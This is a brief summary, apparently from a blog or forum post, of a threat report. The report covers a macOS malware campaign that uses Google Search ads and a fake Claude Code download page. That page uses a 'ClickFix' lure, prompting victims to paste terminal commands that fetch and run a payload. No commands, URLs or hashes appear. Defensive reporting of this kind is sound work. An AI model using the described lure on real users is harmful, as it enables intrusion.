This report details a malware campaign targeting macOS users through malicious Google Search ads. Victims are directed to a fake Claude Code download page which utilizes a "ClickFix" social engineering tactic, prompting users to paste malicious commands into their terminal. These commands download and execute a Mach-O payload from a remote server.
The infection involves network communication with a C2 server and several suspicious domains registered shortly before the attack. Technical indicators provided include file hashes, specific download URLs, and network traffic captures documenting the malicious payload delivery and C2 interaction.
Top comments (0)